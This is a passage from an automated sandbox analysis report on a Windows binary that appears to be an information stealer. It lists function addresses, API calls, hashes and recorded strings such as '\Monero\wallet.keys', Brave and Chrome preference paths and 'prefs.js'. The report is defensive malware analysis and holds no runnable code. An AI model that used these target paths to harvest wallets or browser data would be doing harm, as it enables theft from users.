                                  • FindFirstFileA.KERNEL32(00000000,?,00550B32,00550B2B,00000000,?,?,?,005513F4,00550B2A), ref: 0053BEF5
                                  • StrCmpCA.SHLWAPI(?,005513F8), ref: 0053BF4D
                                  • StrCmpCA.SHLWAPI(?,005513FC), ref: 0053BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0053C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 8d521a4c88311b26d62527e9cf26482a3587f3c4825231d6c627df73e66eefbb
                                  • Instruction ID: d8056c2094389a93f518d84573967fb030d8b73b142e0169f96adaa5a14b237b
                                  • Opcode Fuzzy Hash: 8d521a4c88311b26d62527e9cf26482a3587f3c4825231d6c627df73e66eefbb
                                  • Instruction Fuzzy Hash: 12426772940105A7EB54FB70DC9AEED7B3DFFC4304F404558B90AA6181EE34AB49CB92
                                  Function 00544910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0054492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00544943
                                  • StrCmpCA.SHLWAPI(?,00550FDC), ref: 00544971
                                  • StrCmpCA.SHLWAPI(?,00550FE0), ref: 00544987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00544B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00544B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 909ee75cc1d7a4651b089085e61d0fa8e56fb543fa1f6a0c30f48d4e6478e677
                                  • Instruction ID: 207d6efde5fb77fdacbc9277c2af2d35a01ce14807286b7b25460c6708d6258a
                                  • Opcode Fuzzy Hash: 909ee75cc1d7a4651b089085e61d0fa8e56fb543fa1f6a0c30f48d4e6478e677
                                  • Instruction Fuzzy Hash: E66166B2900219ABDB24EBA0DC49FEE777CBB88705F048588B50D96141EB74AB85CF95
                                  Function 00544570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00544580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00544587
                                  • wsprintfA.USER32 ref: 005445A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 005445BD
                                  • StrCmpCA.SHLWAPI(?,00550FC4), ref: 005445EB
                                  • StrCmpCA.SHLWAPI(?,00550FC8), ref: 00544601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0054468B
                                  • FindClose.KERNEL32(000000FF), ref: 005446A0
                                  • lstrcat.KERNEL32(?,011FE798), ref: 005446C5
                                  • lstrcat.KERNEL32(?,011FDC80), ref: 005446D8
                                  • lstrlen.KERNEL32(?), ref: 005446E5
                                  • lstrlen.KERNEL32(?), ref: 005446F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 98791f69f551ef1c28ebf31d6a9a2672bac88b7dbf1f7d513a2e0c874898cc62
                                  • Instruction ID: 904f948eb8fd0a28c1295f048fa8869b2e5a13bacfb4b72c5dfc06c6a30732c6
                                  • Opcode Fuzzy Hash: 98791f69f551ef1c28ebf31d6a9a2672bac88b7dbf1f7d513a2e0c874898cc62
                                  • Instruction Fuzzy Hash: CF5166B2540218ABDB24EB70DC89FED777CBB94344F408588B61D92190EB749BC5CF96
                                  Function 00543EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00543EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00543EDA
                                  • StrCmpCA.SHLWAPI(?,00550FAC), ref: 00543F08
                                  • StrCmpCA.SHLWAPI(?,00550FB0), ref: 00543F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0054406C
                                  • FindClose.KERNEL32(000000FF), ref: 00544081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 1339739482f4af775f17538afff019b89d4db8f846227d9615ea7f5c0fe30f72
                                  • Instruction ID: 88d6c42450801a1c3c1bc780cd86fa140e683e9aa3ef7111375f9ef228a4a5d2
                                  • Opcode Fuzzy Hash: 1339739482f4af775f17538afff019b89d4db8f846227d9615ea7f5c0fe30f72
                                  • Instruction Fuzzy Hash: FF5146B2900219BBDB24FBB0DC49EEE777CBB84304F408588B65D96180DB759B89CF95
                                  Function 0053ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0053ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0053ED55
                                  • StrCmpCA.SHLWAPI(?,00551538), ref: 0053EDAB
                                  • StrCmpCA.SHLWAPI(?,0055153C), ref: 0053EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0053F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: fab8e78332d2d294d77535f738c2f8c433bc8e3a885a6fbc794396c1c482f6c5
                                  • Instruction ID: 336ad2defafaa74901e763baf879e06f2051cccf5f02388bfa5fccdc46201fd3
                                  • Opcode Fuzzy Hash: fab8e78332d2d294d77535f738c2f8c433bc8e3a885a6fbc794396c1c482f6c5
                                  • Instruction Fuzzy Hash: A5E10672951119AAFB94FB60DC56EEE7B38FF94304F404599B40A62092EF306F8ACF51
                                  Function 0053F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005515B8,00550D96), ref: 0053F71E
                                  • StrCmpCA.SHLWAPI(?,005515BC), ref: 0053F76F
                                  • StrCmpCA.SHLWAPI(?,005515C0), ref: 0053F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0053FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: c64a11dca7e1b79f23a2824ca660226d39261172bfc3a4edb3f5f56d66ce8e32
                                  • Instruction ID: d336c97d4bd175d344c8ef2b7ac02791341dbf926484d44cf7824ab23d4daddc
                                  • Opcode Fuzzy Hash: c64a11dca7e1b79f23a2824ca660226d39261172bfc3a4edb3f5f56d66ce8e32
                                  • Instruction Fuzzy Hash: ABB13371940109ABEB64FF60DC5AEEE7B79FFD4304F4085A8A40A96151EF306B49CF92
                                  Function 005316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0055510C,?,?,?,005551B4,?,?,00000000,?,00000000), ref: 00531923
                                  • StrCmpCA.SHLWAPI(?,0055525C), ref: 00531973
                                  • StrCmpCA.SHLWAPI(?,00555304), ref: 00531989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00531D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00531DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00531E20
                                  • FindClose.KERNEL32(000000FF), ref: 00531E32
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 6797edfa35808feed284fd4f6ee82f5f3d2931fae6515199029dfdc3029b67b4
                                  • Instruction ID: 2508fc5b207e5725b4d825ed5f67d7cbe5c2d58889ecf03e6da21a89a5196c7a
                                  • Opcode Fuzzy Hash: 6797edfa35808feed284fd4f6ee82f5f3d2931fae6515199029dfdc3029b67b4
                                  • Instruction Fuzzy Hash: 3D125671950119ABEB59FB60CC9AEED7B38FF94308F404599B50A62091EF306F89CF91
                                  Function 0053DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00550C2E), ref: 0053DE5E
                                  • StrCmpCA.SHLWAPI(?,005514C8), ref: 0053DEAE
                                  • StrCmpCA.SHLWAPI(?,005514CC), ref: 0053DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0053E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: b85d14cc6a5e55a503b328ba957c888dd1d23a55bc8fa4fa19e1b5d823258ae4
                                  • Instruction ID: 5c2580fdbf5811fd7513ac5b619144c5d2ba3cdda741fb3d30f05cf5c16a035b
                                  • Opcode Fuzzy Hash: b85d14cc6a5e55a503b328ba957c888dd1d23a55bc8fa4fa19e1b5d823258ae4
                                  • Instruction Fuzzy Hash: 9AF1F6718541199AEB55FB60DC9AEEE7B38FF94308F4041D9B40A62091EF306F89CF56
                                  Function 0053DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005514B0,00550C2A), ref: 0053DAEB
                                  • StrCmpCA.SHLWAPI(?,005514B4), ref: 0053DB33
                                  • StrCmpCA.SHLWAPI(?,005514B8), ref: 0053DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0053DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 6c167dd941c7f4d4c3ab082e8ca10173487b41a1b19b964fef79491e444bf73d
                                  • Instruction ID: e17f47a284b3d9e08a64b42a8535dd40e2c958a69501bc581c06fa34e3b766fb
                                  • Opcode Fuzzy Hash: 6c167dd941c7f4d4c3ab082e8ca10173487b41a1b19b964fef79491e444bf73d
